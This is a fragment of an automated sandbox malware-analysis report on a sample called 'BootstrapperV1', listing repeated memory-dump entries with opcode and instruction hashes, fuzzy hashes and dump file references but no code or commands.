                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1f659595460ba86be8dc1a6bc846991faa5147837a1938cbc0a60392457fd60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9931927188D6912FE3179B34AC579F27FA4DB42326B1941E7D14DCB6A3C90E2583C3A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f167ff728553c775836d1fc2ac7e3713c908d2e1255aed79fa97a49f55b503e4
                                                                                                                                                                                                                                              • Instruction ID: 654041a97f5c9fe6f471d57e11302d6302b2d9a368b099537d8c9dc78792d893
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f167ff728553c775836d1fc2ac7e3713c908d2e1255aed79fa97a49f55b503e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA313AA1B0D9895FEB51EB7CC0517E9BBE1FF95301F0841F6D049C32E2DE68A8468382
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b3d675512210cf9b43d9dd9553322b9fa78327fb264713072d780d024b8f7eb5
                                                                                                                                                                                                                                              • Instruction ID: 6131aa8aa7193d6f94fa1749ade2351386cdd07a66c1da3151e9dea1a33af818
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3d675512210cf9b43d9dd9553322b9fa78327fb264713072d780d024b8f7eb5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B3121A2A0D84D2FDB99EF7CD8582F97BD0EF89241B0444FAE58DC72A6DD1858468780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bfcecde9f291a5736e06f9543ea919bde7ffdd78afe67bcdfd6700614f5acfef
                                                                                                                                                                                                                                              • Instruction ID: de91b968232d3a196e6a4fc27e7d4260e2beb49c983702ad9888a5d31e4c923c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfcecde9f291a5736e06f9543ea919bde7ffdd78afe67bcdfd6700614f5acfef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 333137A1A4E6C91FE752FB78A8565EDBFE0DF4A311B0841EBD0C9CB2A3D9181941C352
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 13393b98e34daacc18c28f806ab149f3042a9fa0e9a12b14e4b920c13144a1d4
                                                                                                                                                                                                                                              • Instruction ID: c7bd31303801211f82d2f234fc7e9f68be6454f56565bb711f2c19cffc2a8805
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13393b98e34daacc18c28f806ab149f3042a9fa0e9a12b14e4b920c13144a1d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4731AD72A1892C5FDB94EB6CD4896AC77D1EB99312F0881BAE10DD72A5CE209C058381
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e447a76deb32769f525d0796488b93a996046df9e10f62d8d5e88a79cdcb616b
                                                                                                                                                                                                                                              • Instruction ID: d8dab2c51d3ce8f6b6c06686c0d359d292d142232884eb24a5c2e294ff397a44
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e447a76deb32769f525d0796488b93a996046df9e10f62d8d5e88a79cdcb616b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85213B52A1EE8E4FD742BB7CF4542E677A1EF8222670842F7D089C6157DC08D4468394
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c5d2e76a0ca06a5303ac345d110ef1d62101894fc490879cc1040f0cd8ee4ea6
                                                                                                                                                                                                                                              • Instruction ID: 804cbabb4de2d5dcf3d4926a33e70002df0bd0ec33e9b2b01e715c7b84083873
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5d2e76a0ca06a5303ac345d110ef1d62101894fc490879cc1040f0cd8ee4ea6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16215C70B0CA0C4FEB88EE1CD4556B977E1EB9C311F44427ED14ED32A5CA69A805C685
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b0ec406cee32c212a635a5e46de9e143135112f0bcde768c8f97511ec8479bab
                                                                                                                                                                                                                                              • Instruction ID: df1fa1a874d3685d979ad280a2ede0601dcf9b9c3a0657521311f0376116bd0d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0ec406cee32c212a635a5e46de9e143135112f0bcde768c8f97511ec8479bab
• Instruction Fuzzy Hash: 4B31D16150EBC98FC717EF38C8A49A1BFA1EF5721430982EAD089CB1A3D915E806C750
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29c47d745acad18abf1481c6c1c80c891db77b7dfdf2601cc3210ed46d23124e
• Instruction ID: 0655ad9f3ea8803d031d89c6a0ca60a3cd2f65761d56865da32335585f0d6cb5
• Opcode Fuzzy Hash: 29c47d745acad18abf1481c6c1c80c891db77b7dfdf2601cc3210ed46d23124e
• Instruction Fuzzy Hash: F021A17191CB489BEB14EE18DC4A9E9BBE4FB99711F00012FE949D3250DA61F9458BC2
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 69ead66dfc793380dfa80c945a6bf6df92e796482df236e5cf42155be2e70bfc
                                                                                                                                                                                                                                              • Instruction ID: 35ea41a7dcf486d817eb2c9659e4e9aac6d7f4b628089841250d1a508a204af8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69ead66dfc793380dfa80c945a6bf6df92e796482df236e5cf42155be2e70bfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC11905160E7D94FD757DB3C88656683FB0AF07251B0A81EBD8C9CB1E3D6084C09C3A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d6eed33536adb99a753f197379392acf1c79b2f0f05c2fcd44677ba63c01b723
                                                                                                                                                                                                                                              • Instruction ID: fab84eed22017d6dee4cbbf5d3c65fd201cd477eab99f228e7394dd78d8112f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6eed33536adb99a753f197379392acf1c79b2f0f05c2fcd44677ba63c01b723
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8121B19150E3C61FE713AFB88DA65957FA09F13260F4849EEC1C88F2F3E509541AC302
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 62e04de6e580b5070f33525e3478ce396907376aa39d28acd1a3917f62692285
                                                                                                                                                                                                                                              • Instruction ID: d5b552f034e413b461030984cca3e6cd8b685ff61203553854b0bbd3663c35a4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62e04de6e580b5070f33525e3478ce396907376aa39d28acd1a3917f62692285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D1129A1D5C5881FEB90AB7499124EA7FE4EF45311B4442ABE048D76E3DD581A0583A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: be3a79e3b44de4c2adc6c665fea9ba85e107aa4871e41b7d4710d68c116dfb12
                                                                                                                                                                                                                                              • Instruction ID: 9e86474c90191b35b88640cca009dd2f782d0b1dd6d8aa281c1f46d8d941740c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be3a79e3b44de4c2adc6c665fea9ba85e107aa4871e41b7d4710d68c116dfb12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6911256150D6DD0FE725ABB8886A7FABFD0DF4A301F0405FAD4CCC72A3E928141A8781
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ee5eb546db4ee73418e44084ef7d9786570a6a2c8dc96e842b3c2ffa3d59399c
                                                                                                                                                                                                                                              • Instruction ID: 11f23b4213d20688fcaf86b1903519e0f510f6ad4bb9ee4e48767336b6adf727
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5eb546db4ee73418e44084ef7d9786570a6a2c8dc96e842b3c2ffa3d59399c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30017B83D0DADE1EE3E1A93CD9540651AC0EF89261F1C49F6C188C2296ED0C2C418391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 34f73e02913bb273496a39b7208150829b07729682ccbe50147056b419e653d5
                                                                                                                                                                                                                                              • Instruction ID: 4b0a432ba3db112ffb03f87fc220c94a51cf2652b05827231aa768d105ac6628
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34f73e02913bb273496a39b7208150829b07729682ccbe50147056b419e653d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F20196A1D0E7CD5FE793AB7488690A5BFB0EF57201B0E45EBD488CB1A3D9192848C711
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3574c2b92f4ff9db3bc3419e4a84a72e65f5f257cf3808d71ffde902f6bf2fef
                                                                                                                                                                                                                                              • Instruction ID: 97a8ee962ea7146a6e4b06a8a8c01f01706ec6bd781b54b174a87606efc3928e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3574c2b92f4ff9db3bc3419e4a84a72e65f5f257cf3808d71ffde902f6bf2fef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D811E79080E6CE1FE756EFB448666E9FFE09F47250B4844EDC0D88B6A3E624180BD710
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4d8300f72a77c13d11cef4f08b1e81cf8e38d3aefd2fd735166ccf1d00a646eb
                                                                                                                                                                                                                                              • Instruction ID: c0ad8e0ef878e711c288dcef8861febe305047dd930f2669a88562f8cb97a090
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d8300f72a77c13d11cef4f08b1e81cf8e38d3aefd2fd735166ccf1d00a646eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01A2B1B1C90D1FDA94EA2CE44577663C5EB98322F4045BAE54CD3362DD24EC018390
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: de32d688502256dfb8df778c6b37545cb887bab94ee1780bc11b3aa217b48837
                                                                                                                                                                                                                                              • Instruction ID: efb0db1df0804617914b72c3f97d167a9687775d758d67b4a34d563fb7cb106c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de32d688502256dfb8df778c6b37545cb887bab94ee1780bc11b3aa217b48837
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4701FC71A0D5850FE345A738E8526E17BD1DF86320F0981FAE18CC72E3D99D58438351
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9d291cc1b36601d860fbbb5a6324d8d51081b39fc0018d37cfe8bf22aec9892d
                                                                                                                                                                                                                                              • Instruction ID: 092ff451213df5764f7baa70e4b610a34bdbce635e3f42282ad532afc9bdfc2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d291cc1b36601d860fbbb5a6324d8d51081b39fc0018d37cfe8bf22aec9892d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301A261A2CD0F4B9A99FE3CE4546B6B2D1FF98311B44857AD44DC329AED28E8828340
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fb14c768dd2315c657c1b620b1ee1b5f9ddc4bd6f4e6255f7106c8ac9b443e70
                                                                                                                                                                                                                                              • Instruction ID: f0fa5d360e31be4da572d3b357b0a4aef38862a4cc950595f998e4a517c1fded
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb14c768dd2315c657c1b620b1ee1b5f9ddc4bd6f4e6255f7106c8ac9b443e70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01A261A28D0F8BDA99FB3CD0506B773D1FFE8300744897AD44DC7259ED28E8428780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 45ed213dbab094328ec1c7c2c0ff8e493e9f615c5069f01a9b89d1f8b30a11bd
                                                                                                                                                                                                                                              • Instruction ID: e2ff504ba0f58e154ecf7a46b3beb6670b53c38d3c195abe4d0c8ec3665f61b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45ed213dbab094328ec1c7c2c0ff8e493e9f615c5069f01a9b89d1f8b30a11bd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF04CA6B1CD4A0FA7D9FA3CA09513553C5DBEC266B14407BC58DC3365EC14DC424340
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 16eefe2c057c41860fd80300e80597ab2c2ec09d494d177b7db803281ad3b0fe
                                                                                                                                                                                                                                              • Instruction ID: bf2b0c850a87aa16a6b51ad35f25e519cfc6174eac795215a559b0f257f12dc4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16eefe2c057c41860fd80300e80597ab2c2ec09d494d177b7db803281ad3b0fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65F0C251B1DE1E1FE6D9BE7CA5163B8A2C1DB88132B5055BBD90DC2297EC19DC424344
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c152db5b43666bc0b39d95339068dd41cc50402147a964940257b13085c67508
                                                                                                                                                                                                                                              • Instruction ID: 07a84f14063eca0e68c417e3241e29eba6724c92af3bd8a9a730650013970262
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c152db5b43666bc0b39d95339068dd41cc50402147a964940257b13085c67508
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 531161E0A0E5C62FE746F3B845665B96FE19F4A241B0808FDC0CDDB6A3ED1858098311
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b4ed573771211e1951bc2ac2293d64fe28e03dda4b8bd0985bb29d1186f2f715
                                                                                                                                                                                                                                              • Instruction ID: 2b051cd5b8af1f4c6b45d5cda414893bc6c2775619dd4b9a0d7443ffc437a4f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4ed573771211e1951bc2ac2293d64fe28e03dda4b8bd0985bb29d1186f2f715
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F501F48180EBC62FD3537B7C68602696FA48E4312670D41F7D1C8CB2E7D80C5845C3A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6b72bfebdcb1bde31e99f81ccbf832f4b6078d74c0f2ce8f8a9cb85443770496
                                                                                                                                                                                                                                              • Instruction ID: 557a6d040a1408410f1114306efa1698805b70c9742ec604a77026b5a723bf36
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b72bfebdcb1bde31e99f81ccbf832f4b6078d74c0f2ce8f8a9cb85443770496
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE0149A190DEC92FD796FB3894A42B57FE0EF82352F0841FED089C22A7DD1864468391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e5c070f4b5715708ea5501b9e4729b93691bdb33d933c4107822267487cadd18
                                                                                                                                                                                                                                              • Instruction ID: fef62c7169cacb921e463248fe308b9a07f963024c63fb7a7ae59c75d6b08882
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5c070f4b5715708ea5501b9e4729b93691bdb33d933c4107822267487cadd18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F0B492A0ED8E2AE3966A3C69A51B85F82EB9656178903E3C18CC62E6DC0C5C424391
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
• String ID:
• API String ID:
• Opcode ID: a7b18b738d9e2cbaa6d5ae77fe5dd0bc787c3fbc81c16e4ead04b9fce46c0928
• Instruction ID: 68eafc81693d929018f2408a246e0cb3a9e63f942324cbf874835301cfbbdd40
• Opcode Fuzzy Hash: a7b18b738d9e2cbaa6d5ae77fe5dd0bc787c3fbc81c16e4ead04b9fce46c0928
• Instruction Fuzzy Hash: 1BF022B180C5CCAFD302AF7898095EEBFE0EF86100B0585EBE848C71A3D92825058742
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 417c87358f29b972f431497a676e9a08e2e8ab1e33ce8f794c127f7cf03ebee9
• Instruction ID: 17a6eaa68c032b6449b6425a00b94ffb78c6f0f99db6986f07f5debbf596b367
• Opcode Fuzzy Hash: 417c87358f29b972f431497a676e9a08e2e8ab1e33ce8f794c127f7cf03ebee9
• Instruction Fuzzy Hash: 7CF059C3D0DBDE1FD3A1E63CD9A81546BC1EF9916170C49F7C188C72A7EC0928418392
Memory Dump Source
